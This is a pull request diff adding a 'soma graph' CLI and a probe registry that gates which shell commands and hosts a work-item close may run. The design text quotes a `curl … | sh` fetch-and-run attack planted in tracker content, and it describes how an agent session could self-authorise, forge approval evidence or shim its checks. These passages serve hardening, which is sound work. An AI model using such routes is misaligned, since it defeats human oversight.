### PR TITLE
feat(work-graph): the work graph primitive, its verbs, its trust gate, and orienteer

### DIFF
--- a/design/design-decisions.md
+++ b/design/design-decisions.md
@@ -385,6 +385,131 @@ skill (#487). Full spec: `docs/work-graph.md`.
 [#477](https://github.com/the-metafactory/soma/issues/477), decision tickets
 #483–#487, #491, #492; grilled with the principal 2026-08-02.
 
+#### DD-16 Amendment A: tracker content may parameterise a probe, never introduce code
+
+**Status:** Decided (2026-08-04), amends DD-16.
+
+**Context:** #498 shipped the `soma graph` verbs and the probe runner, and in
+doing so made a latent tension operational. A `command` probe is a shell string
+that lives in the node block — **tracker content** — and `soma graph close`
+executes it on the closing machine. Clause 1 of the determinism dividing line
+says a gate is deterministic iff it reads facts the agent cannot author; a
+`command` probe is agent-authored content that the gate then *runs*. The P1
+safeguard (evidence is `specified` up front and only later `probed`) defends
+against a session inventing a passing result after the fact. It does not defend
+against a session — or anyone else with issue-write — specifying
+`run: "curl … | sh"` at creation and having the close path execute it later,
+under a different identity.
+
+The decisive framing came from the principal: **the tracker is a parameter, not
+a known store.** `soma graph` takes `--repo` / `SOMA_GRAPH_REPO` and, like the
+wayfinder skill it descends from, runs against whatever repo the adopter points
+it at. Soma therefore cannot know that repo's visibility, collaborator set, or
+issue-creation policy. (The soma repo is itself public with two forks, so any
+GitHub account can author a node block today — but the argument does not rest on
+that, and must not: a rule justified by *this* repo's collaborator list is a rule
+that breaks on the next adopter's.) Only two rule shapes survive that
+constraint: **self-relative** rules, which need no knowledge of who is trusted,
+and **content-structural** rules, which deny the capability outright.
+
+Candidates:
+- **(a) Unrestricted**, compensated by confinement (sandbox execution).
+- **(b) Pattern allowlist** in runtime policy.
+- **(c) Named probe registry** — the node declares a name; the name→command
+  mapping lives locally.
+- **(d) Hash-bound ratification**, mirroring DD-7's inbound-content model.
+- **(e) Drop the `command` variant** entirely.
+
+**Decision:** **(c), in its literal-match form.** Tracker content may
+parameterise a probe but may never introduce executable code or a network
+destination.
+
+- **`command`** — the probe keeps its literal `run` string in the node block,
+  and the runner refuses to execute it unless that exact `run` **and `cwd`**
+  pair is declared in the adopter's local probe registry for this repo.
+  Deny-by-default exact match. `cwd` is part of the match and not incidental: a
+  declared `bun test` executed in an attacker-chosen directory is a different
+  command.
+- **`url`** — the target host must appear in the declared host set. Without
+  this, a `url` probe is a blind SSRF oracle: it issues a request from the
+  closing machine to a tracker-supplied address, and the receipt publishes the
+  observed status back to the tracker, which may be world-readable.
+- **`git-ref-exists`, `git-merged-into`, `artifact-exists`** — ungated. They
+  execute as argv with no shell, cause no egress, and their effect is bounded to
+  existence checks in a local tree.
+
+The registry lives in **soma-home only, scoped by repo identity**, under the
+existing `soma policy` inspection surface — §4 already forbids a parallel policy
+registry. Home rather than repo-local because clause 5 puts enforcement out of
+the agent's reach and off the tree it guards: a committed `.soma/probes.json`
+sits inside the guarded tree and is writable by any agent holding Write (#510).
+
+The rule is **uniform** across autonomy classes and applies equally to the
+phase-2 headless tick. The registry already answers *whose code is this* — the
+adopter's — and headlessness changes who is watching, not what is authorised. A
+machine with no declaration refuses those closes; fail-closed. Reading is
+unaffected: `soma graph node` and `frontier` still read any node, because a node
+is data. Only execution gates.
+
+**Rejected:**
+- (a) — confinement is blast-radius management, not authorisation, and answers
+  no part of "whose code is this". macOS offers no cheap reliable sandbox
+  primitive, and a probe that cannot reach the network or the real tree usually
+  cannot prove what it was written to prove. Retained as possible
+  defence-in-depth, not as the gate.
+- (b) — `docs/runtime-command-inspection.md` states Soma v0 "keeps explicit
+  allow as the absence of findings" and defers bypass-style trust lists; an
+  allowlist over arbitrary shell strings also requires the shell parsing that
+  same doc explicitly disclaims. Exact-match on a literal the adopter wrote is
+  not a pattern allowlist and does not reopen this.
+- (d) — maximum consistency with DD-7, and probes would stay self-describing,
+  but it puts a human decision in front of every distinct new command. That
+  places a human in the AFK path, which is the one thing the `auto` class exists
+  to avoid. Exact-match recovers DD-7's *exact-bytes* property anyway — editing
+  the probe on the tracker breaks the match — without needing a scanner or a
+  ratification step.
+- (e) — safest, and nothing would run a shell. Rejected because no remaining
+  probe type can express "the test suite passed", which is the most useful close
+  evidence there is; the `auto` class would lose its principal evidence source.
+- **Name-only registry** (the form (c) was first proposed in) — cleanest
+  separation, since tracker content could not even *look* like code. Rejected
+  because the node would no longer show what closing it executes: a human
+  reading the issue would have to consult a machine-local file, and only the
+  receipt, written afterwards, would record the resolved command. The literal
+  form keeps the tracker self-describing and gets exact-bytes semantics as a
+  side effect.
+
+**Implications:**
+- `docs/work-graph.md` §2.2, §4 and §5 updated (this commit). Spec status for
+  the probe runner moves from "shipped unrestricted" to "registry-gated".
+- Implementation is **not** in this amendment. #524 records the decision; the
+  implementation ticket inherits the blocking edge on #499, so the
+  ships-with-consumer merge stays gated until the gate exists rather than
+  shipping the behaviour this amendment rejects.
+- Existing nodes carrying undeclared `command` probes become unclosable by
+  machine until their command is declared. This is the intended migration: the
+  refusal is specific and actionable, and no node silently changes meaning.
+
+**Residual limits — recorded rather than solved:**
+- An attacker who can write a node body can still choose *which* of the
+  adopter's declared commands runs, and can set `timeoutSec` and `expectExit`
+  freely. Exact-match bounds the blast radius to commands the adopter authored;
+  it gives no control over which one fires, or when.
+- The whole construction rests on the registry being unreachable from the agent.
+  That is #511's invariant, not this amendment's, and the same honest limit
+  §3.2 already records for conjunct 2 applies here: a check that runs inside the
+  environment it judges can be shimmed by a session that sets out to do so.
+- Argument order matters for the ungated types: they are ungated because they
+  are argv and read-only *today*. Adding a probe type that writes, or that
+  passes tracker content to a shell, would reopen this decision rather than
+  inherit it.
+
+**Discussion:** Ticket
+[#524](https://github.com/the-metafactory/soma/issues/524) on map
+[#495](https://github.com/the-metafactory/soma/issues/495); grilled with the
+principal 2026-08-04. Related: DD-7 (inbound content untrusted until a
+hash-bound decision exists), `docs/runtime-command-inspection.md`.
+
 ## 6. Policy & Security
 
 ### DD-7: Soma owns inbound-content security; scanners provide evidence

--- a/docs/soma-home-layout.md
+++ b/docs/soma-home-layout.md
@@ -25,9 +25,16 @@ re-projection rewrites.
 ├── isa/                    # Verification State Artifacts, one <slug>.md per project/task
 │   └── .templates/         # VSA scaffolding templates
 ├── policy/                 # substrate policy declarations
+│   └── probe-registry.json # work-graph probe authorisations (see docs/work-graph.md §2.2)
 ├── imports/                # migration manifests and portability reports
 └── projections/            # cached generated projections (codex, claude-code, …)
 ```
+
+`policy/probe-registry.json` is **not** created by `soma init`: it authorises
+`command` and `url` probes to run on this machine, and its absence is the
+fail-closed default — those probes refuse until an adopter writes it by hand. See
+[`work-graph.md` §2.2](work-graph.md) for the format, or run `soma policy probes`
+to see the current state.
 
 On a fresh machine the profile files start as a **starter profile**
 (`status: starter-profile` in `principal.md`). Replace them with your own

--- a/docs/work-graph.md
+++ b/docs/work-graph.md
@@ -112,6 +112,20 @@ evidence is typed `specified` at node creation and flips to `probed` only
 when the runtime has executed the probe and recorded its output
 (`ProbeResult` above).
 
+Runner semantics settled while implementing #498:
+
+- `repo` on the git and artifact probes is a **local working-tree path**
+  (relative to the runner's cwd), not `owner/name` — `artifact-exists`'s
+  `path` + `atRef` pair resolves as `git cat-file -e <atRef>:<path>`, which
+  needs a checkout rather than an API.
+- **A probe that cannot run is a failed probe, never a skipped one.** Runner
+  errors (network refused, git absent, bad path) record `outcome: "fail"` with
+  the reason in `observed`, so the close refuses. The one thing a runner may
+  not do is let an unrun probe read as a passed one.
+- Git probes execute as argv, never through a shell, so a ref name cannot
+  inject. `command` probes are shell strings by definition — see the trust
+  question that opens on #524.
+
 ### 2.3 Edge
 
 Blocking only: `blocks(a, b)` means `b` is not frontier until `a` is closed.
@@ -193,7 +207,25 @@ soma graph close <node>            # runs declared probes; refuses a hollow clos
 
 `close` enforcement lives in the **installed** soma binary, never the dev tree
 (#483 clause 5). Bypass via raw `gh` remains visible-but-unprevented in
-phase 1; the phase-2 auditor (§5) makes it detected.
+phase 1; the phase-2 auditor (§5) makes it detected. A close run from a dev
+tree warns on stderr rather than refusing — refusing would make the primitive
+undevelopable, and the warning keeps the gap visible state rather than silent.
+
+HITL closes are two-phase, inside the same verb rather than a sixth one:
+`close --propose` posts the proposal comment and stops; `close
+--proposal-comment <id>` reads its reactions and derives the receipt. Two seam
+addenda fell out of implementing it (#498), both the same class as the
+`CreateNodeSpec` addendum on #497:
+
+- `GraphStore.readComment` — conjunct 3 needs the *proposal's* author from the
+  API, and the two phases are separate process invocations, so the author must
+  come back from the backend rather than ride on the command line where it
+  would be caller-authored.
+- The parent edge is read over **GraphQL**. `GET /repos/{repo}/issues/{n}`
+  carries no `parent` key (only the child direction, `/sub_issues`, is in
+  REST), so a REST-only read resolves every node as its own root — which
+  silently degrades conjunct 4 from "the graph root's author may ratify" into
+  "a ticket's own author may ratify its close".
 
 ### 2.7 planSteps bridge
 

--- a/docs/work-graph.md
+++ b/docs/work-graph.md
@@ -197,8 +197,16 @@ declare. **Reading is not executing:** `soma graph node` and
 `soma graph frontier` read any node regardless, because a node is data. Only the
 close path gates.
 
-Exact match also yields DD-7's *exact-bytes* property without a scanner: editing
-a probe on the tracker breaks its match and the close refuses.
+Exact match yields DD-7's *exact-bytes* property for the two fields it covers:
+editing a probe's `run` or `cwd` on the tracker breaks its match and the close
+refuses, with no scanner involved. It does **not** extend to the rest of the
+probe. `expectExit` and `timeoutSec` remain tracker content the gate never reads
+— which is the residual DD-16 Amendment A already records ("an attacker who can
+write a node body … can set `timeoutSec` and `expectExit` freely"). Concretely:
+flipping a declared `bun test` from `expectExit: 0` to `expectExit: 1` makes a
+*failing* suite record as a passed probe. The registry bounds **whose code
+runs**, not what counts as success; widening it to the whole probe would be a new
+decision, not an implementation detail of this one.
 
 **Migration:** existing nodes carrying undeclared `command` probes are
 unclosable by machine until their command is declared. Intended — the refusal is

--- a/docs/work-graph.md
+++ b/docs/work-graph.md
@@ -127,10 +127,10 @@ Runner semantics settled while implementing #498:
 
 #### Probe registry (DD-16 Amendment A)
 
-**Status: specified, not yet enforced.** The runner shipped by #498 executes
-`command` and `url` probes ungated. The gate below lands with
-[#526](https://github.com/the-metafactory/soma/issues/526), which blocks the
-ships-with-consumer merge (#499) so this section cannot reach `main` unenforced.
+**Status: enforced** ([#526](https://github.com/the-metafactory/soma/issues/526)),
+in `src/work-graph-probe-registry.ts` — the gate — and `src/work-graph-probes.ts`,
+which consults it before dispatch so a probe type added later cannot inherit
+"ungated" by omission.
 
 Probe declarations are **tracker content**, so they may parameterise a probe but
 may never introduce executable code or a network destination. The tracker is a
@@ -147,16 +147,59 @@ depend on knowing who is trusted there.
 The registry lives in **soma-home only, scoped by repo identity**, under the
 `soma policy` surface (§4 forbids a parallel policy registry). Not repo-local:
 §1 clause 5 keeps enforcement off the tree it guards, and a committed registry
-is writable by any agent holding Write.
+is writable by any agent holding Write. Concretely
+`~/.soma/policy/probe-registry.json` (override with `soma graph close
+--soma-home`):
+
+```json
+{
+  "version": 1,
+  "repos": {
+    "the-metafactory/soma": {
+      "commands": [{ "run": "bun test", "cwd": "/Users/you/work/soma" }],
+      "urlHosts": ["status.example.com"]
+    }
+  }
+}
+```
+
+Declaration rules, all deny-by-default:
+
+- `cwd` is matched as the **resolved absolute directory** the runner would
+  execute in, not the literal `cwd` field on the node — that field is
+  tracker-supplied and resolves against the closing session's cwd. Declared
+  paths must be absolute (`~` expands); a relative declaration would authorise a
+  different directory per invocation, which is the substitution the `cwd` match
+  exists to prevent.
+- `run` matches **byte for byte**. No trimming, no normalisation.
+- `urlHosts` are bare hostnames — no scheme, port, path, or wildcard. A declared
+  host authorises any port on it; a non-http(s) target is refused outright,
+  since a `file:` or `data:` URL has no host for a host set to authorise.
+- Repository keys are compared case-insensitively. The **whole document** is
+  validated, not just the entry being read: in an authorisation list a
+  silently-ignored typo is what makes an adopter believe something is declared
+  when it is not.
+- Adding an entry is a **loosening** mutation (§4), so it stays identity-bound
+  and fail-closed: the adopter edits the document. `soma policy probes
+  [--repo <owner/name>]` shows what is declared and where; soma ships no verb
+  that writes it, because a gate the agent can widen is not a gate.
 
 The rule is **uniform** — same for every autonomy class and for the phase-2
 headless tick (§5). A machine with no declaration refuses those closes;
-fail-closed. **Reading is not executing:** `soma graph node` and
+fail-closed. Refusal is a **failed probe** (`outcome: "fail"`, reason in
+`observed`), not an exception and not a skip, so `assertClosable` refuses the
+close through the path it already owns; `soma graph close` additionally reports
+the refusal ahead of that generic failure, naming the exact `run`/`cwd` to
+declare. **Reading is not executing:** `soma graph node` and
 `soma graph frontier` read any node regardless, because a node is data. Only the
 close path gates.
 
 Exact match also yields DD-7's *exact-bytes* property without a scanner: editing
 a probe on the tracker breaks its match and the close refuses.
+
+**Migration:** existing nodes carrying undeclared `command` probes are
+unclosable by machine until their command is declared. Intended — the refusal is
+specific and copy-pasteable, and no node silently changes meaning.
 
 ### 2.3 Edge
 
@@ -388,10 +431,14 @@ scheduler (r3 evidence, folded from #485 fog).
   identity-bound `approved` evidence, fail-closed.
 - The **probe registry** (§2.2, DD-16 Amendment A) is a typed document on this
   same surface — declared `command` literals (`run` + `cwd`) and `url` hosts,
-  scoped by repo identity, held in soma-home. It is an authorisation list, not
-  configuration: adding an entry is the adopter saying "I allow this command on
-  this machine", so it follows the same asymmetric-mutation rule as the autonomy
-  floors — tightening is additive, loosening is identity-bound and fail-closed.
+  scoped by repo identity, held in soma-home
+  (`~/.soma/policy/probe-registry.json`, read by `soma policy probes`). It is an
+  authorisation list, not configuration: adding an entry is the adopter saying
+  "I allow this command on this machine", so it follows the same
+  asymmetric-mutation rule as the autonomy floors — tightening is additive,
+  loosening is identity-bound and fail-closed. In practice that means the write
+  is the adopter's hand: `soma policy probes` reads, and there is no verb that
+  adds an entry.
 - Graph-mutation events are an inspection surface beside `governance_event`.
   Enforcement sits where mutations are applied (installed binary now, auditor
   in phase 2) and never executes from the tree it guards.

--- a/docs/work-graph.md
+++ b/docs/work-graph.md
@@ -148,8 +148,11 @@ The registry lives in **soma-home only, scoped by repo identity**, under the
 `soma policy` surface (§4 forbids a parallel policy registry). Not repo-local:
 §1 clause 5 keeps enforcement off the tree it guards, and a committed registry
 is writable by any agent holding Write. Concretely
-`~/.soma/policy/probe-registry.json` (override with `soma graph close
---soma-home`):
+`~/.soma/policy/probe-registry.json` — and **the close path takes no flag that
+moves it**. A caller-selectable registry path is the same hole the home
+placement closes: point it at a file you just wrote and the exact-match
+authorises itself. An adopter whose soma home is not `~/.soma` configures that
+for the environment, never per invocation.
 
 ```json
 {

--- a/docs/work-graph.md
+++ b/docs/work-graph.md
@@ -123,8 +123,40 @@ Runner semantics settled while implementing #498:
   the reason in `observed`, so the close refuses. The one thing a runner may
   not do is let an unrun probe read as a passed one.
 - Git probes execute as argv, never through a shell, so a ref name cannot
-  inject. `command` probes are shell strings by definition — see the trust
-  question that opens on #524.
+  inject.
+
+#### Probe registry (DD-16 Amendment A)
+
+**Status: specified, not yet enforced.** The runner shipped by #498 executes
+`command` and `url` probes ungated. The gate below lands with
+[#526](https://github.com/the-metafactory/soma/issues/526), which blocks the
+ships-with-consumer merge (#499) so this section cannot reach `main` unenforced.
+
+Probe declarations are **tracker content**, so they may parameterise a probe but
+may never introduce executable code or a network destination. The tracker is a
+parameter of `soma graph` — adopters point it at their own repos — so Soma
+cannot know its visibility, collaborator set, or issue policy, and no rule may
+depend on knowing who is trusted there.
+
+| Probe type | Gate |
+| --- | --- |
+| `command` | Refused unless the exact `run` **and** `cwd` pair is declared in the local probe registry for this repo. `cwd` is part of the match: a declared command run in an attacker-chosen directory is a different command. |
+| `url` | Refused unless the target host is in the declared host set. Ungated, this is a blind SSRF oracle — the request issues from the closing machine and the receipt publishes the observed status to a possibly world-readable tracker. |
+| `git-ref-exists`, `git-merged-into`, `artifact-exists` | Ungated — argv, no shell, no egress, bounded to existence checks in a local tree. |
+
+The registry lives in **soma-home only, scoped by repo identity**, under the
+`soma policy` surface (§4 forbids a parallel policy registry). Not repo-local:
+§1 clause 5 keeps enforcement off the tree it guards, and a committed registry
+is writable by any agent holding Write.
+
+The rule is **uniform** — same for every autonomy class and for the phase-2
+headless tick (§5). A machine with no declaration refuses those closes;
+fail-closed. **Reading is not executing:** `soma graph node` and
+`soma graph frontier` read any node regardless, because a node is data. Only the
+close path gates.
+
+Exact match also yields DD-7's *exact-bytes* property without a scanner: editing
+a probe on the tracker breaks its match and the close refuses.
 
 ### 2.3 Edge
 
@@ -354,6 +386,12 @@ scheduler (r3 evidence, folded from #485 fog).
   — free after structural validation, the agent may self-tighten. Loosening is
   a consuming mutation on the gate itself — the most-gated write there is:
   identity-bound `approved` evidence, fail-closed.
+- The **probe registry** (§2.2, DD-16 Amendment A) is a typed document on this
+  same surface — declared `command` literals (`run` + `cwd`) and `url` hosts,
+  scoped by repo identity, held in soma-home. It is an authorisation list, not
+  configuration: adding an entry is the adopter saying "I allow this command on
+  this machine", so it follows the same asymmetric-mutation rule as the autonomy
+  floors — tightening is additive, loosening is identity-bound and fail-closed.
 - Graph-mutation events are an inspection surface beside `governance_event`.
   Enforcement sits where mutations are applied (installed binary now, auditor
   in phase 2) and never executes from the tree it guards.
@@ -376,7 +414,11 @@ sessions are the node executors, soma supplies the verbs.
     `auto`-class frontier nodes headlessly. Each claim is announced to Discord
     with a **60s 👎 veto window**; silence proceeds; terminal states never
     auto-resume (operator verbs only). No autonomous ticking under the
-    principal's credentials, ever.
+    principal's credentials, ever. The tick runs `command` and `url` probes
+    under the **same** registry gate as an interactive session (§2.2) — the
+    registry answers *whose code this is*, and headlessness changes who is
+    watching, not what is authorised. A tick machine with no registry refuses
+    those closes rather than running them.
 - **Close audit (phase 2):** a GitHub Actions auditor fires on issue-close,
   re-verifies structurally checkable evidence from the close receipt's
   pointers (commit SHAs, CI run URLs, comment IDs, probe outputs), and reopens

--- a/src/cli.ts
+++ b/src/cli.ts
@@ -119,6 +119,12 @@ import {
   runPreCompactCli,
   type ParsedPreCompactArgs,
 } from "./cli/precompact";
+import {
+  GRAPH_COMMAND_HELP,
+  parseGraphArgs,
+  runGraphCli,
+  type ParsedGraphArgs,
+} from "./cli/graph";
 
 export { SomaCliError } from "./cli/errors";
 
@@ -153,6 +159,7 @@ type ParsedArgs =
   | ParsedImportArgs
   | ParsedMigrateArgs
   | ParsedAlgorithmArgs
+  | ParsedGraphArgs
   | ParsedLifecycleArgs
   | ParsedMemoryArgs
   | ParsedTelemetryArgs
@@ -172,6 +179,7 @@ const TOP_LEVEL_COMMANDS = [
   "doctor",
   "export",
   "feedback",
+  "graph",
   "history",
   "import",
   "inference",
@@ -205,6 +213,7 @@ const TOP_LEVEL_COMMANDS = [
 
 const COMMAND_HELP: Record<string, { usage: string; subcommands?: Record<string, string> }> = {
   algorithm: ALGORITHM_COMMAND_HELP,
+  graph: GRAPH_COMMAND_HELP,
   memory: MEMORY_COMMAND_HELP,
   telemetry: TELEMETRY_COMMAND_HELP,
   stats: STATS_COMMAND_HELP,
@@ -296,6 +305,10 @@ function parseArgs(args: string[]): ParsedArgs {
 
   if (args[0] === "algorithm") {
     return parseAlgorithmArgs(args);
+  }
+
+  if (args[0] === "graph") {
+    return parseGraphArgs(args);
   }
 
   if (args[0] === "policy") {
@@ -502,6 +515,10 @@ export async function runSomaCli(args: string[]): Promise<string> {
 
   if (parsed.command === "algorithm") {
     return runAlgorithmCli(parsed);
+  }
+
+  if (parsed.command === "graph") {
+    return runGraphCli(parsed);
   }
 
   if (parsed.command === "vsa") {

--- a/src/cli/graph.ts
+++ b/src/cli/graph.ts
@@ -30,6 +30,7 @@
 import {
   WorkGraph,
   WorkGraphError,
+  agentExternalEvidenceKinds,
   assertClosable,
   renderCloseReceipt,
   type CloseEvidence,
@@ -72,7 +73,7 @@ export const GRAPH_COMMAND_HELP: { usage: string; subcommands: Record<GraphActio
     claim: "Usage: soma graph claim <id> [--identity <login>] [--repo <owner/name>] [--json]",
     add: "Usage: soma graph add <root> --title <text> --autonomy <auto|propose|approve> [--kind <k>] [--body <text>|--body-file <path>] [--checkpoint <id>] [--probe <json>]... [--blocked-by <id>]... [--budget-tokens <n>] [--budget-invocations <n>] [--budget-minutes <n>] [--repo <owner/name>] [--json]",
     close:
-      "Usage: soma graph close <id> [--propose --body <text>|--body-file <path>] [--proposal-comment <id>] [--checkpoint <id>] [--evidence <json>]... [--identity <login>] [--dry-run] [--repo <owner/name>] [--soma-home <dir>]",
+      "Usage: soma graph close <id> [--propose --body <text>|--body-file <path>] [--proposal-comment <id>] [--checkpoint <id>] [--evidence <json>]... [--identity <login>] [--dry-run] [--repo <owner/name>]",
   },
 };
 
@@ -126,8 +127,6 @@ export interface ParsedGraphCloseArgs {
     identity?: string;
     dryRun?: boolean;
     evidence: CloseEvidence[];
-    /** Where the probe registry lives when it is not `~/.soma` (§2.2). */
-    somaHome?: string;
   };
 }
 
@@ -317,10 +316,6 @@ function parseCloseArgs(target: string, rest: string[]): ParsedGraphCloseArgs {
         options.identity = readOption(rest, index, arg);
         index += 1;
         break;
-      case "--soma-home":
-        options.somaHome = readOption(rest, index, arg);
-        index += 1;
-        break;
       case "--evidence":
         options.evidence.push(parseEvidenceOption(readOption(rest, index, arg)));
         index += 1;
@@ -335,6 +330,14 @@ function parseCloseArgs(target: string, rest: string[]): ParsedGraphCloseArgs {
 
   if (options.propose === true && options.body === undefined && options.bodyFile === undefined) {
     throw new Error("soma graph close --propose needs --body or --body-file.");
+  }
+  // `--propose` posts a public comment and returns before the dry-run branch is
+  // ever reached, so the two together would write exactly what `--dry-run`
+  // promises not to. Refuse the combination rather than silently honouring one.
+  if (options.propose === true && options.dryRun === true) {
+    throw new Error(
+      "soma graph close --propose cannot be combined with --dry-run: proposing posts a comment, which is a write.",
+    );
   }
 
   return { command: "graph", action: "close", target, options };
@@ -384,8 +387,14 @@ export interface GraphCliDeps {
    * The registry is loaded per close and handed to the runner rather than read
    * inside it: one place decides which repo's declarations apply, and the
    * refusal messages can name the document the adopter has to edit.
+   *
+   * Takes the repo and **nothing else**. There is deliberately no caller-supplied
+   * path: the registry's location is the one thing the closing session may not
+   * choose, or it authorises itself by pointing at a file it just wrote. An
+   * adopter whose soma home is not `~/.soma` configures that for the environment,
+   * never per invocation.
    */
-  loadProbeRegistry: (repo: string, somaHome: string | undefined) => Promise<ProbeRegistry>;
+  loadProbeRegistry: (repo: string) => Promise<ProbeRegistry>;
   runProbes: (probes: readonly Probe[], registry: ProbeRegistry) => Promise<ProbeResult[]>;
   checkConfinement: () => Promise<ConfinementResult>;
   /** An externally re-checkable anchor for probe evidence — the commit the probes ran against. */
@@ -446,8 +455,7 @@ function defaultDeps(): GraphCliDeps {
     createStore: (repo) => createGitHubGraphStore({ repo }),
     resolveRepo: resolveGraphRepo,
     resolveIdentity: async () => await gh(["api", "user", "--jq", ".login"]),
-    loadProbeRegistry: async (repo, somaHome) =>
-      await defaultLoadProbeRegistry({ repo, ...(somaHome === undefined ? {} : { somaHome }) }),
+    loadProbeRegistry: async (repo) => await defaultLoadProbeRegistry({ repo }),
     runProbes: async (probes, registry) => await defaultRunProbes(probes, { registry }),
     checkConfinement: async () =>
       await defaultCheckConfinement({
@@ -680,9 +688,34 @@ async function runClose(
     );
   }
 
+  // `assertClosable` counts any admissible-kind entry carrying a pointer, and it
+  // cannot tell one the runtime derived from one the caller typed — a receipt is
+  // just a receipt by the time it gets there. So the distinction has to be
+  // enforced where it still exists: here, at the boundary where caller-supplied
+  // and derived evidence are still separate values. Without this, `--evidence
+  // '{"kind":"approved",…}'` closes an approve-class node with no proposal and no
+  // human, which is §3.2 defeated by a flag.
+  const reserved = agentExternalEvidenceKinds(state.node.autonomy);
+  const usurping = parsed.options.evidence.filter((entry) => reserved.includes(entry.kind));
+  if (usurping.length > 0) {
+    throw new SomaCliError(
+      [
+        `--evidence cannot carry ${reserved.map((kind) => `\`${kind}\``).join(" or ")} on a ${state.node.autonomy}-class node.`,
+        `Those kinds are what closes it, so the runtime derives them — ${
+          state.node.autonomy === "auto"
+            ? "from probes that ran and passed (§3.1)"
+            : "from a ratified proposal comment (§3.2)"
+        } — and a hand-written one would be exactly the self-declared verification the gate exists to refuse.`,
+        `Refused: ${usurping.map((entry) => `${entry.kind} — ${entry.summary}`).join("; ")}`,
+        `Use --evidence for informational kinds (${EVIDENCE_KINDS.filter((kind) => !reserved.includes(kind)).join(", ")}).`,
+      ].join("\n"),
+      1,
+    );
+  }
+
   const identity = parsed.options.identity ?? (await deps.resolveIdentity());
   const probes = state.node.probes ?? [];
-  const registry = await deps.loadProbeRegistry(repo, parsed.options.somaHome);
+  const registry = await deps.loadProbeRegistry(repo);
   const probeResults = await deps.runProbes(probes, registry);
   const refusals = probeResults.filter((result) => isProbeRefusal(result));
 

--- a/src/cli/graph.ts
+++ b/src/cli/graph.ts
@@ -670,6 +670,20 @@ async function runClose(
     if (body === undefined || body.trim().length === 0) {
       throw new SomaCliError("soma graph close --propose needs a non-empty --body or --body-file.", 1);
     }
+    // Posting is a write, and phase one must not publish a proposal that phase
+    // two will refuse: a node with no attached checkpoint cannot close at all,
+    // and no verb attaches one afterwards, so the 👍 it collects would be
+    // permanently unusable. Check what is checkable now — the probes have not
+    // run yet, so this is the checkpoint and nothing more.
+    if (state.node.checkpointId === undefined || state.node.checkpointId.length === 0) {
+      throw new SomaCliError(
+        [
+          `Node ${ref.id} has no attached checkpoint, so it cannot close — proposing would publish a comment nobody can act on.`,
+          `Attach one to the node block first; there is no verb that adds it after creation.`,
+        ].join("\n"),
+        1,
+      );
+    }
     const comment = await graph.postComment(ref, body);
     return [
       `Posted proposal comment ${comment.id} on node ${ref.id} (${repo}).`,

--- a/src/cli/graph.ts
+++ b/src/cli/graph.ts
@@ -1,0 +1,769 @@
+/**
+ * `soma graph` — the CLI verb layer over the GraphStore seam
+ * (`docs/work-graph.md` §2.6, #498).
+ *
+ * Five verbs, exactly the spec's list:
+ *
+ * ```
+ * soma graph frontier <root>   open, unassigned, unblocked — confirmed by direct fetch
+ * soma graph node <id>         read one node — also the planSteps bridge's read path (§2.7)
+ * soma graph claim <node>      assign, re-read, tie-break on race
+ * soma graph add <root> …      create node (+ edges) — additive, structurally validated
+ * soma graph close <node>      runs declared probes; refuses a hollow close
+ * ```
+ *
+ * The rules live in {@link WorkGraph} and {@link assertClosable}; this module
+ * only gathers inputs, calls them, and renders. Two things it *does* own,
+ * because they are close-time derivations rather than contract logic:
+ *
+ * - **Probe execution** — declared probes run here (§2.2) and their results go
+ *   into the receipt.
+ * - **Attestation derivation** — the four conjuncts of §3.2, never a config flag.
+ *
+ * Evidence is derived from the two mechanisms the spec names — passed probes
+ * (`probed`, §3.1) and a ratified proposal (`approved`, §3.2) — rather than
+ * hand-written by the closing session, which would be the self-declared
+ * verification the whole design exists to refuse. `--evidence` adds entries; it
+ * cannot substitute for either.
+ */
+
+import {
+  WorkGraph,
+  WorkGraphError,
+  assertClosable,
+  renderCloseReceipt,
+  type CloseEvidence,
+  type CloseReceipt,
+  type CommentRef,
+  type GraphStore,
+  type NodeRef,
+  type NodeState,
+  type Probe,
+  type ProbeResult,
+  type Reaction,
+  type WorkGraphEvidenceKind,
+} from "../work-graph";
+import {
+  checkConfinement as defaultCheckConfinement,
+  deriveAttestation,
+  findGraphRoot,
+  type ConfinementResult,
+} from "../work-graph-attestation";
+import { createGitHubGraphStore } from "../work-graph-github";
+import { allProbesPassed, runCommand, runProbes as defaultRunProbes } from "../work-graph-probes";
+import { SomaCliError } from "./errors";
+import { readOption } from "./parse-utils";
+
+const GRAPH_ACTIONS = ["frontier", "node", "claim", "add", "close"] as const;
+type GraphAction = (typeof GRAPH_ACTIONS)[number];
+
+const EVIDENCE_KINDS: readonly WorkGraphEvidenceKind[] = ["specified", "probed", "tested", "judged", "approved"];
+
+export const GRAPH_COMMAND_HELP: { usage: string; subcommands: Record<GraphAction, string> } = {
+  usage: "Usage: soma graph <frontier|node|claim|add|close> ...",
+  subcommands: {
+    frontier: "Usage: soma graph frontier <root> [--repo <owner/name>] [--json]",
+    node: "Usage: soma graph node <id> [--repo <owner/name>] [--json]",
+    claim: "Usage: soma graph claim <id> [--identity <login>] [--repo <owner/name>] [--json]",
+    add: "Usage: soma graph add <root> --title <text> --autonomy <auto|propose|approve> [--kind <k>] [--body <text>|--body-file <path>] [--checkpoint <id>] [--probe <json>]... [--blocked-by <id>]... [--budget-tokens <n>] [--budget-invocations <n>] [--budget-minutes <n>] [--repo <owner/name>] [--json]",
+    close:
+      "Usage: soma graph close <id> [--propose --body <text>|--body-file <path>] [--proposal-comment <id>] [--checkpoint <id>] [--evidence <json>]... [--identity <login>] [--dry-run] [--repo <owner/name>]",
+  },
+};
+
+interface GraphSharedOptions {
+  repo?: string;
+  json?: boolean;
+}
+
+export interface ParsedGraphFrontierArgs {
+  command: "graph";
+  action: "frontier";
+  target: string;
+  options: GraphSharedOptions;
+}
+
+export interface ParsedGraphNodeArgs {
+  command: "graph";
+  action: "node";
+  target: string;
+  options: GraphSharedOptions;
+}
+
+export interface ParsedGraphClaimArgs {
+  command: "graph";
+  action: "claim";
+  target: string;
+  options: GraphSharedOptions & { identity?: string };
+}
+
+export interface ParsedGraphAddArgs {
+  command: "graph";
+  action: "add";
+  target: string;
+  options: GraphSharedOptions & {
+    /** Untyped on purpose — {@link WorkGraph.createNode} is the one validation barrier (§2.1). */
+    spec: Record<string, unknown>;
+    blockedBy: string[];
+  };
+}
+
+export interface ParsedGraphCloseArgs {
+  command: "graph";
+  action: "close";
+  target: string;
+  options: GraphSharedOptions & {
+    propose?: boolean;
+    body?: string;
+    bodyFile?: string;
+    proposalComment?: string;
+    checkpointId?: string;
+    identity?: string;
+    dryRun?: boolean;
+    evidence: CloseEvidence[];
